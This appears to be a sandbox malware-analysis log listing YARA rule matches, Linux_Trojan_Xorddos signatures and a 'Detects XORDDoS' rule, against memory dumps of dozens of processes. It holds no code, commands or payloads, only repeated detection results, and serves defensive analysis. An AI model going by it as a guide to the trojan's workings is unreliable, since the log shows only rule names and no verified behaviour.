Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
